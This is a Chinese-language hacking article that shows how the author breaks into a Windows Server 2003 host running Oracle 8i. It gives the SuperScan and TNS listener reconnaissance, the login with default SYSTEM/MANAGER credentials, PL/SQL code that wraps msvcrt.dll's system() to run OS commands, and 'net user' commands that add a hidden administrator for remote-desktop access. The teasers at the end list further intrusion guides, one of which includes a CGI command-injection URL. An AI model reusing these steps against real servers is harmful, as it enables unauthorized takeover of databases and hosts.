通过Oracle8i入侵系统全过程(图)

所属分类: 网络安全 / 黑客入侵 阅读数: 2171
收藏 0 赞 0 分享
最近看了些有关 Oracle 的安全资料,看后随手做了一个渗透测试,把过程记录下来方便日后查阅.。先用 SuperScan4.0 扫描下要测试的主机,速度很快,结果如图 1 所示:



图 1

端口 1521 是 Oracle 的 TNS Listener 默认监听的端口,通过扫描报告还可以看到 Oracle 的版本为 8i.现在还不 知道对方的操作系统版本,看到主机还开放了终端服务,直接连上去看下操作系统版本.如图 2,



图 2

确定操作系统版本为 Windows Server 2003 企业版。Oracle 10g 之前的版本默认情况下是允许远程管理 TNS Listener 的,这台主机的 Oracle 版本为 8i,我们通过 TNS Listenner 来收集下更多的详细信息.如果本地安装了 Oracle 可以直接调用 Lsnrctl 连接到测试的主机,如图 3 所示:



图 3
通过输入"status "命令我们可以得到 oracle 详细版本(8.1.70.0),操作系统(Windows),跟踪级别为 OFF(说明没 有开启审核),安全性为 OFF(说明没有设置 Listener 口令),日志文件的绝对路径(判断 Oracle 安装路径),数据库的 SID(ccdr).

要远程管理 Oracle, 需要知道 IP,数据库的 SID,和连接的用户名和密码.IP 和 SID 我们已经知道了. 接下来用oscanner 工具扫描下要测试主机是否存在默认的密码.如图 4 所示.



图 4

看来 管 理 员 安 装 完 Oracle8i 后就 没 有 进 行 进 一 步 的 安 全 配 置 , 所有 的 用 户 名 密 码 都 是 默 认 的 . 在

Oracle 中,SYS/SYSTEM 都是具有 DBA 权限的帐户,我这里选择使用 SYSTEM/MA NAGER 来连接数据库.

在本地用 Sqlplus 连接到目标 Oracle 数据库,命令为:

SqlPlus system/manager@//victimip:1521/ccdr,

连接成功 后,可以通过 PL/SQL 来运行 OS 命令,首先需要创建库来定位 msvcrt.dll 文件.这里需要使用完整的路径,通过刚才

对主机的 查点 我们 已经 知道 操作 系统为 win2003, 如果系统 安装 到 C 盘的话 , 那 msvcrt.dll 默认路径 就为

c:\windows\system32\msvcrt.dll.创建库的命令如下:

CREATE OR REPLACE LIBRARY exec_shell AS ’c:\windows\system32\msvcrt.dll’;

接下来写一个过程来调用 msvcrt.dll 里的 system()函数.命令如下:

CREATE OR REPLACE PACKAGE oracmd IS

PROCEDURE exec (cmdstring IN CHAR);

end oracmd;

/

CREATE ORE REPLACE PACKAGE BODY oracmd IS

PROCEDURE exec (cmdstring IN CHAR)

IS EXTERNAL

NAME "system"

LIBRARY exec_shell

LANGUAGE C;

end oracmd;

/

创建完后,就可以运行 OS 命令了.由于主机已经开放了终端服务,所以我这里添加个管理员,然后连接服务器.命 令如下:

exec oracmd.exec (’net user mickey imissyou /add’);

exec oracmd.exec (’net localgroup administrators mickey /add’);

帐户创建完成后,如图 5,就可以连接终端服务了,一台肉鸡到手了.:-)



图 5
更多精彩内容其他人还在看

有防火墙网站的入侵过程

一、踩点   ping www.111.com 发现超时,可以是有防火墙或做了策略。再用superscan扫一下,发现开放的端口有很多个,初步估计是软件防火墙。   二、注入   从源文件里搜索关键字asp,找到了一个注入点。用nbsi注入,发现是s
收藏 0 赞 0 分享

dcomrpc入侵

需要的工具: 很好的:?radmin.exe 扫描工具: retinarpcdcom.exe 溢出攻击工具:RpcDcom(通用溢出工具) 脚本开启telnet工具:telnet.vbe opentelnet.exe resumetelne
收藏 0 赞 0 分享

攻破雷客图ASP站长安全助手

到Lake2网站上下了1.5的源代码,发现这个版本的确改进了不少,又增加了查杀功能: 1:查杀通过了Unicode编码的ASP木马 2:查杀使用了(Open|Create)TextFile, SaveToFile,Save, set Server,Server.(
收藏 0 赞 0 分享

网页“黑手”如何入侵你的Windows系统

网络的流行,让我们的世界变得更加美好,但它也有让人不愉快的时候。比如,当你收到一封主题为“I Love You”的邮件,兴冲冲的双击附件想欣赏一下这封“情书”的时候,却在无意当中成为了病毒的受害者和传播者;或者在浏览某个网页的时候,浏览器标题栏就变成了类似“
收藏 0 赞 0 分享

环境变量在Hacking中的应用

首先,我们先了解下什么叫环境变量! 环境变量一般是指在操作系统中用来指定操作系统运行环境的一些参数,比如临时文件夹位置和系统文件夹位置等等。这点有点类似于DOS时期的默认路径,当你运行某些程时序除了在当前文件夹中寻找外,还会到设置的默认路径中去查找。比
收藏 0 赞 0 分享

一次尝试IRIX的过程(nobody shell)

1、http://www.targe.co.jp/cgi-bin/infosrch.cgi?cmd=getdoc&db=man&fname=|ls -la 这就是它的利用方法了。其中ls -la是我们要运行的命令,我不太习惯在web shell里面干活,还
收藏 0 赞 0 分享

三分钟搞定隐藏管理员账号

对regedit.exe大家都很熟悉,但却不能对注册表的项键设置权限,而regedt32.exe最大的优点就是能够对注册表的项键设置权限。nt/2000/xp的帐户信息都在注册表的HKEY_LOCAL_MACHINE\SAM\SAM键下,但是除了系统用户SYSTEM外,其它用户都
收藏 0 赞 0 分享

高手解析如何入侵3389

工具:WINNTAutoAttack自动攻击器(扫漏洞);SQLTOOLS(SA空口令连接器);RAMDIN影子3.0中文版(远程控制程序)(RADMIN注册码: 08US9A95I lKa9nbOLXqv0V8xqdDvKGcNcTpN2wV11iSqOCVuA
收藏 0 赞 0 分享

完整的XSS wrom网站入侵实例示范

XSS wrom网站如何实现入侵?不说废话,且看怎么实现,我先拿SOHU BLOG做示范。   1. 测试过滤字符,下面都是构造XSS所需要的关键字符(未包含全角字符,空格是个TABLE,/前是真正的空格),在个人档案处看过滤了哪些。   ’’;
收藏 0 赞 0 分享

谈VBS在Hacking中的作用———SQL Inject中的应用

平常我们遇到有注入漏洞一类的网站大部分人都是用NBSI Or 阿D一类的注射工具。但有的站点的注射点很难构造,或者说注射语句比较特殊。如果用手工去注射的话,费时又费力!但自己写针对性的工具的话,对一些刚入门不久或不会编程的朋友来说,实在是一件很痛苦的事情。
收藏 0 赞 0 分享
查看更多